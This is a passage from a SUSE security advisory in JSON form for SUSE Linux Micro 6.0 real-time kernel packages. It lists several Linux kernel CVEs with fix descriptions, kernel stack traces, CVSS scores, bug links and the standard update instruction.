include/linux/io_uring.h:19 [inline]\n do_exit+0x2ce/0x2bd0 kernel/exit.c:911\n do_group_exit+0xd3/0x2a0 kernel/exit.c:1112\n get_signal+0x2671/0x26d0 kernel/signal.c:3034\n arch_do_signal_or_restart+0x8f/0x7e0 arch/x86/kernel/signal.c:337\n __exit_to_user_mode_loop kernel/entry/common.c:41 [inline]\n exit_to_user_mode_loop+0x8c/0x540 kernel/entry/common.c:75\n __exit_to_user_mode_prepare include/linux/irq-entry-common.h:226 [inline]\n syscall_exit_to_user_mode_prepare include/linux/irq-entry-common.h:256 [inline]\n syscall_exit_to_user_mode_work include/linux/entry-common.h:159 [inline]\n syscall_exit_to_user_mode include/linux/entry-common.h:194 [inline]\n do_syscall_64+0x4ee/0xf80 arch/x86/entry/syscall_64.c:100\n entry_SYSCALL_64_after_hwframe+0x77/0x7f\nRIP: 0033:0x7fa02738f749\nRSP: 002b:00007fa0281ae0e8 EFLAGS: 00000246 ORIG_RAX: 00000000000000ca\nRAX: fffffffffffffe00 RBX: 00007fa0275e6098 RCX: 00007fa02738f749\nRDX: 0000000000000000 RSI: 0000000000000080 RDI: 00007fa0275e6098\nRBP: 00007fa0275e6090 R08: 0000000000000000 R09: 0000000000000000\nR10: 0000000000000000 R11: 0000000000000246 R12: 0000000000000000\nR13: 00007fa0275e6128 R14: 00007fff14e4fcb0 R15: 00007fff14e4fd98\n\nThere\u0027s really nothing wrong here, outside of processing these reads\nwill take a LONG time. However, we can speed up the exit by checking the\nIO_WQ_BIT_EXIT inside the io_worker_handle_work() loop, as syzbot will\nexit the ring after queueing up all of these reads. Then once the first\nitem is processed, io-wq will simply cancel the rest. That should avoid\nsyzbot running into this complaint again.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23113",
"url": "https://www.suse.com/security/cve/CVE-2026-23113"
},
{
"category": "external",
"summary": "SUSE Bug 1258278 for CVE-2026-23113",
"url": "https://bugzilla.suse.com/1258278"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2026-23113"
},
{
"cve": "CVE-2026-23116",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23116"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\npmdomain: imx8m-blk-ctrl: Remove separate rst and clk mask for 8mq vpu\n\nFor i.MX8MQ platform, the ADB in the VPUMIX domain has no separate reset\nand clock enable bits, but is ungated and reset together with the VPUs.\nSo we can\u0027t reset G1 or G2 separately, it may led to the system hang.\nRemove rst_mask and clk_mask of imx8mq_vpu_blk_ctl_domain_data.\nLet imx8mq_vpu_power_notifier() do really vpu reset.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23116",
"url": "https://www.suse.com/security/cve/CVE-2026-23116"
},
{
"category": "external",
"summary": "SUSE Bug 1258277 for CVE-2026-23116",
"url": "https://bugzilla.suse.com/1258277"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2026-23116"
},
{
"cve": "CVE-2026-23119",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23119"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbonding: provide a net pointer to __skb_flow_dissect()\n\nAfter 3cbf4ffba5ee (\"net: plumb network namespace into __skb_flow_dissect\")\nwe have to provide a net pointer to __skb_flow_dissect(),\neither via skb-\u003edev, skb-\u003esk, or a user provided pointer.\n\nIn the following case, syzbot was able to cook a bare skb.\n\nWARNING: net/core/flow_dissector.c:1131 at __skb_flow_dissect+0xb57/0x68b0 net/core/flow_dissector.c:1131, CPU#1: syz.2.1418/11053\nCall Trace:\n \u003cTASK\u003e\n bond_flow_dissect drivers/net/bonding/bond_main.c:4093 [inline]\n __bond_xmit_hash+0x2d7/0xba0 drivers/net/bonding/bond_main.c:4157\n bond_xmit_hash_xdp drivers/net/bonding/bond_main.c:4208 [inline]\n bond_xdp_xmit_3ad_xor_slave_get drivers/net/bonding/bond_main.c:5139 [inline]\n bond_xdp_get_xmit_slave+0x1fd/0x710 drivers/net/bonding/bond_main.c:5515\n xdp_master_redirect+0x13f/0x2c0 net/core/filter.c:4388\n bpf_prog_run_xdp include/net/xdp.h:700 [inline]\n bpf_test_run+0x6b2/0x7d0 net/bpf/test_run.c:421\n bpf_prog_test_run_xdp+0x795/0x10e0 net/bpf/test_run.c:1390\n bpf_prog_test_run+0x2c7/0x340 kernel/bpf/syscall.c:4703\n __sys_bpf+0x562/0x860 kernel/bpf/syscall.c:6182\n __do_sys_bpf kernel/bpf/syscall.c:6274 [inline]\n __se_sys_bpf kernel/bpf/syscall.c:6272 [inline]\n __x64_sys_bpf+0x7c/0x90 kernel/bpf/syscall.c:6272\n do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]\n do_syscall_64+0xec/0xf80 arch/x86/entry/syscall_64.c:94",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23119",
"url": "https://www.suse.com/security/cve/CVE-2026-23119"
},
{
"category": "external",
"summary": "SUSE Bug 1258273 for CVE-2026-23119",
"url": "https://bugzilla.suse.com/1258273"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2026-23119"
},
{
"cve": "CVE-2026-23121",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23121"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmISDN: annotate data-race around dev-\u003ework\n\ndev-\u003ework can re read locklessly in mISDN_read()\nand mISDN_poll(). Add READ_ONCE()/WRITE_ONCE() annotations.\n\nBUG: KCSAN: data-race in mISDN_ioctl / mISDN_read\n\nwrite to 0xffff88812d848280 of 4 bytes by task 10864 on cpu 1:\n misdn_add_timer drivers/isdn/mISDN/timerdev.c:175 [inline]\n mISDN_ioctl+0x2fb/0x550 drivers/isdn/mISDN/timerdev.c:233\n vfs_ioctl fs/ioctl.c:51 [inline]\n __do_sys_ioctl fs/ioctl.c:597 [inline]\n __se_sys_ioctl+0xce/0x140 fs/ioctl.c:583\n __x64_sys_ioctl+0x43/0x50 fs/ioctl.c:583\n x64_sys_call+0x14b0/0x3000 arch/x86/include/generated/asm/syscalls_64.h:17\n do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]\n do_syscall_64+0xd8/0x2c0 arch/x86/entry/syscall_64.c:94\n entry_SYSCALL_64_after_hwframe+0x77/0x7f\n\nread to 0xffff88812d848280 of 4 bytes by task 10857 on cpu 0:\n mISDN_read+0x1f2/0x470 drivers/isdn/mISDN/timerdev.c:112\n do_loop_readv_writev fs/read_write.c:847 [inline]\n vfs_readv+0x3fb/0x690 fs/read_write.c:1020\n do_readv+0xe7/0x210 fs/read_write.c:1080\n __do_sys_readv fs/read_write.c:1165 [inline]\n __se_sys_readv fs/read_write.c:1162 [inline]\n __x64_sys_readv+0x45/0x50 fs/read_write.c:1162\n x64_sys_call+0x2831/0x3000 arch/x86/include/generated/asm/syscalls_64.h:20\n do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]\n do_syscall_64+0xd8/0x2c0 arch/x86/entry/syscall_64.c:94\n entry_SYSCALL_64_after_hwframe+0x77/0x7f\n\nvalue changed: 0x00000000 -\u003e 0x00000001",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23121",
"url": "https://www.suse.com/security/cve/CVE-2026-23121"
},
{
"category": "external",
"summary": "SUSE Bug 1258309 for CVE-2026-23121",
"url": "https://bugzilla.suse.com/1258309"
},
{
"category": "external",
"summary": "SUSE Bug 1259135 for CVE-2026-23121",
"url": "https://bugzilla.suse.com/1259135"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "important"
}
],
"title": "CVE-2026-23121"
},
{
"cve": "CVE-2026-23129",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23129"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndpll: Prevent duplicate registrations\n\nModify the internal registration helpers dpll_xa_ref_{dpll,pin}_add()\nto reject duplicate registration attempts.\n\nPreviously, if a caller attempted to register the same pin multiple\ntimes (with the same ops, priv, and cookie) on the same device, the core\nsilently increments the reference count and return success. This behavior\nis incorrect because if the caller makes these duplicate registrations\nthen for the first one dpll_pin_registration is allocated and for others\nthe associated dpll_pin_ref.refcount is incremented. During the first\nunregistration the associated dpll_pin_registration is freed and for\nothers WARN is fired.\n\nFix this by updating the logic to return `-EEXIST` if a matching\nregistration is found to enforce a strict \"register once\" policy.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23129",
"url": "https://www.suse.com/security/cve/CVE-2026-23129"
},
{
"category": "external",
"summary": "SUSE Bug 1258299 for CVE-2026-23129",
"url": "https://bugzilla.suse.com/1258299"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2026-23129"
},
{
"cve": "CVE-2026-23133",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23133"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: ath10k: fix dma_free_coherent() pointer\n\ndma_alloc_coherent() allocates a DMA mapped buffer and stores the\naddresses in XXX_unaligned fields. Those should be reused when freeing\nthe buffer rather than the aligned addresses.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23133",
"url": "https://www.suse.com/security/cve/CVE-2026-23133"
},
{
"category": "external",
"summary": "SUSE Bug 1258249 for CVE-2026-23133",
"url": "https://bugzilla.suse.com/1258249"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:L/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2026-23133"
},
{
"cve": "CVE-2026-23135",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23135"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: ath12k: fix dma_free_coherent() pointer\n\ndma_alloc_coherent() allocates a DMA mapped buffer and stores the\naddresses in XXX_unaligned fields. Those should be reused when freeing\nthe buffer rather than the aligned addresses.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23135",
"url": "https://www.suse.com/security/cve/CVE-2026-23135"
},
{
"category": "external",
"summary": "SUSE Bug 1258245 for CVE-2026-23135",
"url": "https://bugzilla.suse.com/1258245"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:L/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2026-23135"
},
{
"cve": "CVE-2026-23139",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23139"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetfilter: nf_conncount: update last_gc only when GC has been performed\n\nCurrently last_gc is being updated everytime a new connection is\ntracked, that means that it is updated even if a GC wasn\u0027t performed.\nWith a sufficiently high packet rate, it is possible to always bypass\nthe GC, causing the list to grow infinitely.\n\nUpdate the last_gc value only when a GC has been actually performed.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23139",
"url": "https://www.suse.com/security/cve/CVE-2026-23139"
},
{
"category": "external",
"summary": "SUSE Bug 1258304 for CVE-2026-23139",
"url": "https://bugzilla.suse.com/1258304"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2026-23139"
},
{
"cve": "CVE-2026-23141",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23141"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: send: check for inline extents in range_is_hole_in_parent()\n\nBefore accessing the disk_bytenr field of a file extent item we need\nto check if we are dealing with an inline extent.\nThis is because for inline extents their data starts at the offset of\nthe disk_bytenr field. So accessing the disk_bytenr\nmeans we are accessing inline data or in case the inline data is less\nthan 8 bytes we can actually cause an invalid\nmemory access if this inline extent item is the first item in the leaf\nor access metadata from other items.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23141",
"url": "https://www.suse.com/security/cve/CVE-2026-23141"
},
{
"category": "external",
"summary": "SUSE Bug 1258377 for CVE-2026-23141",
"url": "https://bugzilla.suse.com/1258377"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2026-23141"
},
{
"cve": "CVE-2026-23145",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23145"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\next4: fix iloc.bh leak in ext4_xattr_inode_update_ref\n\nThe error branch for ext4_xattr_inode_update_ref forget to release the\nrefcount for iloc.bh. Find this when review code.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23145",
"url": "https://www.suse.com/security/cve/CVE-2026-23145"
},
{
"category": "external",
"summary": "SUSE Bug 1258326 for CVE-2026-23145",
"url": "https://bugzilla.suse.com/1258326"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2026-23145"
},
{
"cve": "CVE-2026-23146",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23146"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nBluetooth: hci_uart: fix null-ptr-deref in hci_uart_write_work\n\nhci_uart_set_proto() sets HCI_UART_PROTO_INIT before calling\nhci_uart_register_dev(), which calls proto-\u003eopen() to initialize\nhu-\u003epriv. However, if a TTY write wakeup occurs during this window,\nhci_uart_tx_wakeup() may schedule write_work before hu-\u003epriv is\ninitialized, leading to a NULL pointer dereference in\nhci_uart_write_work() when proto-\u003edequeue() accesses hu-\u003epriv.\n\nThe race condition is:\n\n CPU0 CPU1\n ---- ----\n hci_uart_set_proto()\n set_bit(HCI_UART_PROTO_INIT)\n hci_uart_register_dev()\n tty write wakeup\n hci_uart_tty_wakeup()\n hci_uart_tx_wakeup()\n schedule_work(\u0026hu-\u003ewrite_work)\n proto-\u003eopen(hu)\n // initializes hu-\u003epriv\n hci_uart_write_work()\n hci_uart_dequeue()\n proto-\u003edequeue(hu)\n // accesses hu-\u003epriv (NULL!)\n\nFix this by moving set_bit(HCI_UART_PROTO_INIT) after proto-\u003eopen()\nsucceeds, ensuring hu-\u003epriv is initialized before any work can be\nscheduled.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
